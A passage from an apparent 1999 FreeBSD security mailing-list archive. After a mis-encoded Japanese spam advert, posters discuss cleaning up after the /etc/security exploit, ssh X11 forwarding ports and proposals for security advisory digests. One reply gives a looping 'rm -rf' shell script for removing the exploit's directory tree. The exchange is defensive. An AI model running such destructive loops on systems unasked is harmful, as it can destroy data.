$B:GE,$J%K%e!<%9(B! over the normal coloer telephone line. $B:#!"@$3&$GOCBj$N4JC1%F%l%SEEOC(B All you have to do is just $B$N>R2p$G$9!#(B connect this videophone with $B<+Bp$N%F%l%S$HEEOC$K$D$J$0$@$1$G(B the telephone and television. $B#T#VEEOC$KAaJQ$o$j!*!J9);vITMW!K(B which you have in your home. $BEEOCBe$O!":#$^$G$HF1$8$G$9!#(B Telephone charge is the same as ever. $B1s$/$NM'?M$d2HB2$H!"4i$r8+$J$,$i(B Face to face communication with distant $BOC$;$k$N$G0l0B?4!*!*(B your distant family $BCMCJ$O0lBf$G(B69,000$B1_$G$9!#(B Price per unit: 6,9000 yen $B2<$r%/%j%C%/$7$F$_$F2<$5$$!#(B Please click left below. http://www.academyjapan.co.jp academy@academyjpan.co.jp $B%"%+%G%_!; Thu, 2 Sep 1999 09:13:21 -0700 (PDT) (envelope-from mayres@zone.unixshell.com) Received: from localhost (mayres@localhost) by zone.unixshell.com (8.9.3/8.9.3) with ESMTP id MAA98497 for ; Thu, 2 Sep 1999 12:13:16 -0400 (EDT) (envelope-from mayres@zone.unixshell.com) Date: Thu, 2 Sep 1999 12:13:16 -0400 (EDT) From: Matt Ayres To: freebsd-security@FreeBSD.ORG Subject: /etc/security exploit Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hey everybody, sorry to ask this question again, but how do I delete the directory made by the /etc/security exploit? Thanks, Matt Ayres To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 2 9:32:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from unicorn.carrier.kiev.ua (unicorn.carrier.kiev.ua [193.193.193.113]) by hub.freebsd.org (Postfix) with ESMTP id 46E9914BDB for ; Thu, 2 Sep 1999 09:32:20 -0700 (PDT) (envelope-from netch@carrier.kiev.ua) Received: (from netch@localhost) by unicorn.carrier.kiev.ua (8.Who.Cares/8.Who.Cares) id TAA19051; Thu, 2 Sep 1999 19:31:21 +0300 (EEST) (envelope-from netch) Date: Thu, 2 Sep 1999 19:31:21 +0300 From: Valentin Nechayev To: Matt Ayres Cc: freebsd-security@FreeBSD.ORG Subject: Re: /etc/security exploit Message-ID: <19990902193120.A21070@lucky.net> Reply-To: netch@lucky.net References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: ; from Matt Ayres on Thu, Sep 02, 1999 at 12:13:16PM -0400 X-42: On Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thu, Sep 02, 1999 at 12:13:16, mayres wrote about "/etc/security exploit": > Hey everybody, sorry to ask this question again, but how do I delete the > directory made by the /etc/security exploit? ;) while :; do rm -rf 1 2 *core* mv *Y* 1 mv 1/A* 2 rm -rf 1 *core* mv 2/* . rm -rf 2 *core* echo -n '.' done (according to standard Babcia_Padlina's exploit) -- -- Valentin Nechayev netch@lucky.net II:LDXIII/MCMLXXII.CCC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 2 10:34:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from merkur.hrz.uni-giessen.de (merkur.hrz.uni-giessen.de [134.176.2.12]) by hub.freebsd.org (Postfix) with ESMTP id 2803C14CD0 for ; Thu, 2 Sep 1999 10:34:38 -0700 (PDT) (envelope-from Ferdinand.Wiecha@stkolleg.fh-giessen.de) Received: from caspar.mni.fh-giessen.de by merkur.hrz.uni-giessen.de with ESMTP for freebsd-security@freebsd.org; Thu, 2 Sep 1999 19:33:57 +0200 Received: from asc-p07.mni.fh-giessen.de ([134.176.180.227] helo=stkolleg.fh-giessen.de ident=fchw) by caspar.mni.fh-giessen.de with esmtp (Exim 2.12 #6) id 11MaaM-00080w-00 for freebsd-security@FreeBSD.ORG; Thu, 2 Sep 1999 19:23:42 +0200 Message-Id: <37CEB59C.FC310EE5@stkolleg.fh-giessen.de> Date: Thu, 02 Sep 1999 19:36:28 +0200 From: "Ferdinand Ch. Wiecha" X-Mailer: Mozilla 4.61 [en] (X11; I; Linux 2.2.12 i686) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: (no subject) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 2 14: 0:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay.gw.tislabs.com (relay.gw.tislabs.com [192.94.214.100]) by hub.freebsd.org (Postfix) with ESMTP id 408F114F42 for ; Thu, 2 Sep 1999 14:00:39 -0700 (PDT) (envelope-from stevek@tislabs.com) Received: by relay.gw.tislabs.com; id RAA22566; Thu, 2 Sep 1999 17:05:21 -0400 (EDT) Received: from clipper.gw.tislabs.com(10.33.1.2) by relay.gw.tislabs.com via smap (4.1) id xma022558; Thu, 2 Sep 99 17:05:15 -0400 Received: from mufasa.va.tislabs.com (mufasa.va.tislabs.com [192.168.10.18]) by clipper.gw.tislabs.com (8.9.3/8.9.1) with ESMTP id QAA03717 for ; Thu, 2 Sep 1999 16:58:44 -0400 (EDT) Received: from localhost (stevek@localhost) by mufasa.va.tislabs.com (8.9.3/8.9.3) with ESMTP id QAA53897 for ; Thu, 2 Sep 1999 16:59:21 -0400 (EDT) (envelope-from stevek@mufasa.va.tislabs.com) Date: Thu, 2 Sep 1999 16:59:21 -0400 (EDT) From: Steve Kiernan To: freebsd-security@freebsd.org Subject: Generic Software Wrappers 1.2.1 now available... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Some time ago there was some discussion of adding security policies to the FreeBSD kernel. ("Using capabilties aaginst shell code" August 1998) In that thread, Robert Watson had referered to the Generic Software Wrappers Toolkit which we at NAI Labs (formerly TIS Labs) were working on. We now have a release available for use. The current source release contains support for FreeBSD 2.2.x on Intel x86 and Solaris 2.6 on UltraSPARC, and preliminary support for FreeBSD 3.x on Intel x86 (not all syscalls are characterized and the code is not SMP-safe) and Windows NT on Intel x86 (the implementation is in user-space and not complete). The following is an excerpt from the readme file (you can grab a copy of the Toolkit from ftp://ftp.tislabs.com/pub/wrappers): Generic Software Wrappers Large-scale critical information systems increasingly are built by combining Commercial Off The Shelf (COTS) software components. Unfortunately, security and reliability requirements of critical information systems may not be apparent until such systems are near deployment: COTS software cannot be designed to anticipate all such requirements. Additionally, cost factors dictate that COTS software is developed with ``commercial-grade'' assurance. For these reasons, technologies are needed both to add security and reliability functionality to COTS software, and to increase general assurance of systems composed of COTS components. This DARPA-sponsored research (under contract F30602-96-C-0333) is developing techniques and tools for specifying and implementing generic software wrappers. Generic software wrappers intercept COTS component interactions and bind them with additional functions that implement practical security (e.g., restricting, filtering) and reliability (e.g., redundancy, crash data recovery) policies. This research is organized into three tasks: 1) Formulate both a preliminary Wrapper Definition Language (WDL) for specifying security and reliability software wrappers and a preliminary Wrapper Support Interface (WSI) that provides operating system services needed by wrappers. Prototype a WDL compiler and develop a WSI simulator to provide experimental feedback during the formulation of the 2) Develop a wrapper-supporting FreeBSD UNIX prototype system. Develop a Wrapper Support Subsystem (WSS) suitable for inclusion in mainstream kernelized UNIX systems, and develop WDL wrapper tools for conveniently wrapping/unwrapping selected UNIX system components. 3) Develop Sun Solaris and Windows NT wrapper-supporting prototype systems. Adjust the WDL and the WSI as needed to support these environments. By developing multiple prototypes, demonstrate that wrapper concepts are portable to dissimilar systems. Task one and two are complete. Task three is partially complete, with the Windows NT port still under development. This software is a proof of concept. It has bugs. Since it adds functionality to the kernel, those bugs may trash your system. Do Not Use This Software on systems you can not afford to trash. We know there are unfixed bugs that can and will crash the operating system. You have been warned. -- Stephen Kiernan stevek@tislabs.com NAI Labs, A Division of Network Associates, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 2 23:47:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 5A4D714EE8 for ; Thu, 2 Sep 1999 23:47:23 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id AAA19993; Fri, 3 Sep 1999 00:47:18 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id AAA23391; Fri, 3 Sep 1999 00:47:22 -0600 (MDT) Message-Id: <199909030647.AAA23391@harmony.village.org> To: netch@lucky.net Subject: Re: /etc/security exploit Cc: Matt Ayres , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Thu, 02 Sep 1999 19:31:21 +0300." <19990902193120.A21070@lucky.net> References: <19990902193120.A21070@lucky.net> Date: Fri, 03 Sep 1999 00:47:22 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Or use a find -delete built with my kludge fixes. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 3 3: 5:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from twin.kar.net (twin.kar.net [195.178.131.130]) by hub.freebsd.org (Postfix) with ESMTP id 7D5E614FB5 for ; Fri, 3 Sep 1999 03:05:30 -0700 (PDT) (envelope-from tamara @igph.kiev.ua) Received: from inst.igph.kiev.ua ([195.178.144.6]) by twin.kar.net (8.9.3/8.9.3) with ESMTP id NAA09585 for ; Fri, 3 Sep 1999 13:10:12 +0300 (EET DST) Received: from igph.kiev.ua by inst.igph.kiev.ua with ESMTP id NAA06488; (8.8.7/vAk3/1.9) Fri, 3 Sep 1999 13:03:57 +0300 (EEST) Message-ID: <37CF8E90.ED49634B@igph.kiev.ua> Date: Fri, 03 Sep 1999 13:02:08 +0400 From: Tamara <"tamara "@igph.kiev.ua> X-Mailer: Mozilla 4.04 [en] (Win95; I) MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: (no subject) Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Please ! The mailing list discusses various security matters related to FreeBSD including ipfw. Thank you To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 3 5:30:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from thelab.hub.org (nat203.199.mpoweredpc.net [142.177.203.199]) by hub.freebsd.org (Postfix) with ESMTP id 9FE1D14D0E for ; Fri, 3 Sep 1999 05:30:30 -0700 (PDT) (envelope-from scrappy@hub.org) Received: from localhost (scrappy@localhost) by thelab.hub.org (8.9.3/8.9.1) with ESMTP id JAA64491 for ; Fri, 3 Sep 1999 09:28:09 -0300 (ADT) (envelope-from scrappy@hub.org) X-Authentication-Warning: thelab.hub.org: scrappy owned process doing -bs Date: Fri, 3 Sep 1999 09:28:09 -0300 (ADT) From: The Hermit Hacker To: freebsd-security@freebsd.org Subject: ssh + xauth problem ... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org When I login using ssh, I get the following message: /usr/X11R6/bin/xauth: (stdin):1: bad display name "hub:19.0" in "add" command I've tried recompiling/installing XFree86 *and* ssh, but can't get rid of it... I see it on none of my other FreeBSD machines. xauth is as of today: hub> ls -lt /usr/X11R6/bin/xauth -rwxr-xr-x 1 root wheel 25896 Sep 3 07:45 /usr/X11R6/bin/xauth Can someone point me at where I need to fix this? :( Marc G. Fournier ICQ#7615664 IRC Nick: Scrappy Systems Administrator @ hub.org primary: scrappy@hub.org secondary: scrappy@{freebsd|postgresql}.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 3 9: 8:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from bantu.cl.msu.edu (bantu.cl.msu.edu [35.8.3.18]) by hub.freebsd.org (Postfix) with ESMTP id A7C6814C42 for ; Fri, 3 Sep 1999 09:08:51 -0700 (PDT) (envelope-from dervish@bantu.cl.msu.edu) Received: (from dervish@localhost) by bantu.cl.msu.edu (8.9.3/8.9.3) id MAA69320; Fri, 3 Sep 1999 12:06:25 -0400 (EDT) (envelope-from dervish) Date: Fri, 3 Sep 1999 12:06:25 -0400 From: bush doctor To: The Hermit Hacker Cc: freebsd-security@freebsd.org Subject: Re: ssh + xauth problem ... Message-ID: <19990903120625.A69076@bantu.cl.msu.edu> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: ; from The Hermit Hacker on Fri, Sep 03, 1999 at 09:28:09AM -0300 X-Operating-System: FreeBSD 4.0-CURRENT i386 X-PGP-Fingerprint: 35 95 F8 63 DA 5B 32 51 8F A9 AC 3C B4 74 F3 BA WWW-Home-Page: http://www.msu.edu/~ikhala Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Out of da blue The Hermit Hacker aka (scrappy@hub.org) said: > > When I login using ssh, I get the following message: > > /usr/X11R6/bin/xauth: (stdin):1: bad display name "hub:19.0" in "add" command > > I've tried recompiling/installing XFree86 *and* ssh, but can't get rid of > it... I see it on none of my other FreeBSD machines. > > xauth is as of today: > > hub> ls -lt /usr/X11R6/bin/xauth > -rwxr-xr-x 1 root wheel 25896 Sep 3 07:45 /usr/X11R6/bin/xauth > > Can someone point me at where I need to fix this? :( looks like you need something like this in the global .cshrc file on the remote host: # set display if remote login ... if ($?REMOTEHOST) then setenv DISPLAY $REMOTEHOST\:0.0 endif Remember that sshd sets the X11 display offset in its config file ala X11DisplayOffset 10 hth > > Marc G. Fournier ICQ#7615664 IRC Nick: Scrappy > Systems Administrator @ hub.org > primary: scrappy@hub.org secondary: scrappy@{freebsd|postgresql}.org > > #:^) -- So ya want ta here da roots? Dem that feels it knows it ... bush doctor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 3 10:46:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from super-g.com (super-g.com [207.240.140.161]) by hub.freebsd.org (Postfix) with ESMTP id 7C7F41510D for ; Fri, 3 Sep 1999 10:46:45 -0700 (PDT) (envelope-from spork@super-g.com) Received: by super-g.com (Postfix, from userid 1000) id E9270B8DE; Fri, 3 Sep 1999 13:44:42 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by super-g.com (Postfix) with SMTP id D8DC2B8DC for ; Fri, 3 Sep 1999 13:44:42 -0400 (EDT) Date: Fri, 3 Sep 1999 13:44:42 -0400 (EDT) From: spork X-Sender: spork@super-g.inch.com To: freebsd-security@freebsd.org Subject: Security Alerts Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I've been reading bugtraq more often that this list (2500 messages in this box..) and following a few FBSD exploits there (/etc/security / fts, the mbuf DoS) and also a few where it's unclear as to whether FBSD is affected (libtermcap, wu-ftpd, proftpd). So what I'm wondering is whether the project is in need of someone to digest, discuss, and regurgitate some of these things into security advisories. I personally can appreciate the fact that an ordinary user or admin might not be able to follow every bug that comes up on bugtraq or on this list, and the idea of a central repository on the FreeBSD webpage that is kept up to date and includes third-party software (esp. if it's in common use, like wu) seems like a good one. So I'm volunteering to write this stuff up, all I need is the go-ahead from someone... Charles --- Charles Sprickman spork@super-g.com --- "...there's no idea that's so good you can't ruin it with a few well-placed idiots." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 3 12:43: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from cm-24-142-61-16.cableco-op.ispchannel.com (cm-24-142-61-16.cableco-op.ispchannel.com [24.142.61.16]) by hub.freebsd.org (Postfix) with ESMTP id 8E18E150D8 for ; Fri, 3 Sep 1999 12:43:03 -0700 (PDT) (envelope-from jwgray@netbox.com) Received: from localhost (jwgray@localhost) by cm-24-142-61-16.cableco-op.ispchannel.com (8.8.8/8.8.8) with ESMTP id MAA17772; Fri, 3 Sep 1999 12:41:15 -0700 (PDT) (envelope-from jwgray@netbox.com) X-Authentication-Warning: cm-24-142-61-16.cableco-op.ispchannel.com: jwgray owned process doing -bs Date: Fri, 3 Sep 1999 12:41:15 -0700 (PDT) From: Jeff X-Sender: jwgray@cm-24-142-61-16.cableco-op.ispchannel.com To: spork Cc: freebsd-security@FreeBSD.ORG Subject: Re: Security Alerts In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Wonderful idea. I lurk on this group and bugtraq/securityfocus and fall into your target market - which ones are critical, which ones are minor risks, which ones effect FBSD. Count me in as a reader of your digests. I am certain that there are many many lurkers such as myself. Thanks for volunteering. Jeff On Fri, 3 Sep 1999, spork wrote: > Hi, > > I've been reading bugtraq more often that this list (2500 messages in this > box..) and following a few FBSD exploits there (/etc/security / fts, the > mbuf DoS) and also a few where it's unclear as to whether FBSD is affected > (libtermcap, wu-ftpd, proftpd). > > So what I'm wondering is whether the project is in need of someone to > digest, discuss, and regurgitate some of these things into security > advisories. I personally can appreciate the fact that an ordinary user or > admin might not be able to follow every bug that comes up on bugtraq or on > this list, and the idea of a central repository on the FreeBSD webpage > that is kept up to date and includes third-party software (esp. if it's in > common use, like wu) seems like a good one. > > So I'm volunteering to write this stuff up, all I need is the go-ahead > from someone... > > Charles > > --- > Charles Sprickman > spork@super-g.com > --- > "...there's no idea that's so good you can't > ruin it with a few well-placed idiots." > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 3 13:22:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from metis.host4u.net (metis.host4u.net [209.150.128.22]) by hub.freebsd.org (Postfix) with ESMTP id 4A0CD14E1E for ; Fri, 3 Sep 1999 13:22:52 -0700 (PDT) (envelope-from dan.langille@dvl-software.com) Received: from wocker (210-55-152-212.ipnets.xtra.co.nz [210.55.152.212]) by metis.host4u.net (8.8.5/8.8.5) with ESMTP id PAA24920; Fri, 3 Sep 1999 15:20:54 -0500 Message-Id: <199909032020.PAA24920@metis.host4u.net> From: "Dan Langille" Organization: DVL Software Limited To: spork Date: Sat, 4 Sep 1999 08:20:59 +1200 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Security Alerts Reply-To: dan.langille@dvl-software.com Cc: freebsd-security@freebsd.org In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12a) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 3 Sep 99, at 13:44, spork wrote: > So I'm volunteering to write this stuff up, all I need is the go-ahead from > someone... Just do it. The good thing about services such as the one you are proposing is that it doesn't need anyone's "approval". If you think it's a good idea, do it. People will use it. [If a place can't be found within the FreeBSD pages, then I'll be quite happy to publish them on The FreeBSD Diary.] -- Dan Langille - DVL Software Limited The FreeBSD Diary - http://www.freebsdiary.org/freebsd/ NZ FreeBSD User Group - http://www.nzfug.nz.freebsd.org/ The Racing System - http://www.racingsystem.com/racingsystem.htm unix @ home - http://www.unixathome.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 3 16:36:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id D81F914CC9 for ; Fri, 3 Sep 1999 16:36:50 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id QAA67512; Fri, 3 Sep 1999 16:36:39 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: spork Cc: freebsd-security@FreeBSD.ORG Subject: Re: Security Alerts In-reply-to: Your message of "Fri, 03 Sep 1999 13:44:42 EDT." Date: Fri, 03 Sep 1999 16:36:39 -0700 Message-ID: <67508.936401799@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > So what I'm wondering is whether the project is in need of someone to > digest, discuss, and regurgitate some of these things into security > advisories. I personally can appreciate the fact that an ordinary user or > admin might not be able to follow every bug that comes up on bugtraq or on More than actually generating advisories, something which our security officers do a pretty reasonable job on, what we *really* need is someone to test the existing advisories/random reports/etc and figure out which exploits or DoS attacks are actually genuine. Quite a bit of stuff gets sent to the security list and quite a bit of it often has no applicability whatsoever to FreeBSD, leading to a situation where security officers put it on the "test this at some point" pile and that pile can get pretty deep. When faced with a "this has been tested and the following releases of FreeBSD are vulnerable" sort of message, however, they know that it's clearly a matter for immediate attention and it gets "escallated" quite a bit. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 3 23: 7:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.cybcon.com (mail.cybcon.com [216.190.188.5]) by hub.freebsd.org (Postfix) with ESMTP id EBB3F151D0 for ; Fri, 3 Sep 1999 23:07:42 -0700 (PDT) (envelope-from wwoods@cybcon.com) Received: from freebsd.cybcon.com (william@pm3b-11.cybcon.com [205.147.75.76]) by mail.cybcon.com (8.9.0/8.9.0) with ESMTP id XAA23885; Fri, 3 Sep 1999 23:06:42 -0700 (PDT) Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <67508.936401799@localhost> Date: Fri, 03 Sep 1999 23:06:42 -0700 (PDT) Reply-To: wwoods@cybcon.com From: William Woods To: "Jordan K. Hubbard" Subject: Re: Security Alerts Cc: freebsd-security@FreeBSD.ORG, spork Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jordan, I don't know C programming very well at all, I am starting a C class in a week, but is there something I could do to help with this situation? William On 03-Sep-99 Jordan K. Hubbard wrote: >> So what I'm wondering is whether the project is in need of someone to >> digest, discuss, and regurgitate some of these things into security >> advisories. I personally can appreciate the fact that an ordinary user or >> admin might not be able to follow every bug that comes up on bugtraq or on > > More than actually generating advisories, something which our security > officers do a pretty reasonable job on, what we *really* need is > someone to test the existing advisories/random reports/etc and figure > out which exploits or DoS attacks are actually genuine. Quite a bit > of stuff gets sent to the security list and quite a bit of it often > has no applicability whatsoever to FreeBSD, leading to a situation > where security officers put it on the "test this at some point" pile > and that pile can get pretty deep. When faced with a "this has been > tested and the following releases of FreeBSD are vulnerable" sort of > message, however, they know that it's clearly a matter for immediate > attention and it gets "escallated" quite a bit. > > - Jordan > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message ---------------------------------- E-Mail: William Woods Date: 03-Sep-99 Time: 22:48:29 This message was sent by XFMail ---------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 2:13: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 87D4414F44 for ; Sat, 4 Sep 1999 02:13:02 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id CAA69730; Sat, 4 Sep 1999 02:12:33 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: wwoods@cybcon.com Cc: "Jordan K. Hubbard" , freebsd-security@FreeBSD.ORG, spork Subject: Re: Security Alerts In-reply-to: Your message of "Fri, 03 Sep 1999 23:06:42 PDT." Date: Sat, 04 Sep 1999 02:12:32 -0700 Message-ID: <69726.936436352@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I don't know C programming very well at all, I am starting a C class > in a week, but is there something I could do to help with this > situation? That's a hard question to answer - it really depends on the exploit. Most don't really require a firm knowledge of C to understand since they come already written and you basically just need to compile and run them. You have to have enough advanced FreeBSD knowledge, however, to distinguish an "exploit" from a DoS to a just-plain-bogus report and only you know whether that's true in your case. :) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 4:30:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f151.hotmail.com [207.82.251.30]) by hub.freebsd.org (Postfix) with SMTP id 7CED21518B for ; Sat, 4 Sep 1999 04:30:54 -0700 (PDT) (envelope-from madrapour@hotmail.com) Received: (qmail 43008 invoked by uid 0); 4 Sep 1999 11:28:55 -0000 Message-ID: <19990904112855.43007.qmail@hotmail.com> Received: from 195.96.144.201 by www.hotmail.com with HTTP; Sat, 04 Sep 1999 04:28:53 PDT X-Originating-IP: [195.96.144.201] From: "N. N.M" To: freebsd-security@freebsd.org Subject: Tracing open ports on FreeBSD Date: Sat, 04 Sep 1999 04:28:53 PDT Mime-Version: 1.0 Content-Type: text/plain; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, 1) I realized that the TCP ports of 6010,6011,6012 and 6013 are openly listening on my FreeBSD box. I don't know how this has happened, as they were not open before. They are related to X11 as far as I know. But I had already disabled XDM in /etc/ttys file. Could anybody tell me how I can disable this stuff? Or how they could get opened and listening? 2) This is some time that two UDP ports have got opened as well. Again, I don't have any idea on how they have got enabled. The ports are 1352 and 2699. Generally, how I can trace when a port gets suddenly enabled? thanks very much, Nazila N. ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 4:43:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id F266D1508E for ; Sat, 4 Sep 1999 04:43:33 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 36624 invoked by uid 1001); 4 Sep 1999 11:41:45 +0000 (GMT) To: madrapour@hotmail.com Cc: freebsd-security@freebsd.org Subject: Re: Tracing open ports on FreeBSD From: sthaug@nethelp.no In-Reply-To: Your message of "Sat, 04 Sep 1999 04:28:53 PDT" References: <19990904112855.43007.qmail@hotmail.com> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Sat, 04 Sep 1999 13:41:45 +0200 Message-ID: <36622.936445305@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > 1) I realized that the TCP ports of 6010,6011,6012 and 6013 are openly > listening on my FreeBSD box. I don't know how this has happened, as they > were not open before. They are related to X11 as far as I know. But I had > already disabled XDM in /etc/ttys file. Could anybody tell me how I can > disable this stuff? Or how they could get opened and listening? You're probably using ssh with X11 forwarding. If you use the 'sockstat' program you'll find that sshd is listening to those ports. Disable it by running ssh without X11 forwarding (e.g. 'X11Forwarding no' in the sshd config file). Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 6:40:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns.skylink.it (ns.skylink.it [194.177.113.1]) by hub.freebsd.org (Postfix) with ESMTP id 7BD6715232 for ; Sat, 4 Sep 1999 06:40:40 -0700 (PDT) (envelope-from hibma@skylink.it) Received: from heidi.plazza.it (va-164.skylink.it [194.185.55.164]) by ns.skylink.it (8.9.1/8.8.8) with ESMTP id PAA18837; Sat, 4 Sep 1999 15:38:19 +0200 Received: from localhost (localhost [127.0.0.1]) by heidi.plazza.it (8.9.3/8.8.5) with ESMTP id LAA56971; Sat, 4 Sep 1999 11:40:27 GMT X-No-Spam: Neither the receipients nor the senders email address(s) are to be used for Unsolicited (Commercial) Email without the explicit written consent of either party; as a per-message fee is incurred for inbound and outbound traffic to the originator. Posted-Date: Sat, 4 Sep 1999 11:40:27 GMT Date: Sat, 4 Sep 1999 13:40:26 +0200 (CEST) From: Nick Hibma X-Sender: n_hibma@heidi.plazza.it Reply-To: Nick Hibma To: "N. N.M" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Tracing open ports on FreeBSD In-Reply-To: <19990904112855.43007.qmail@hotmail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: 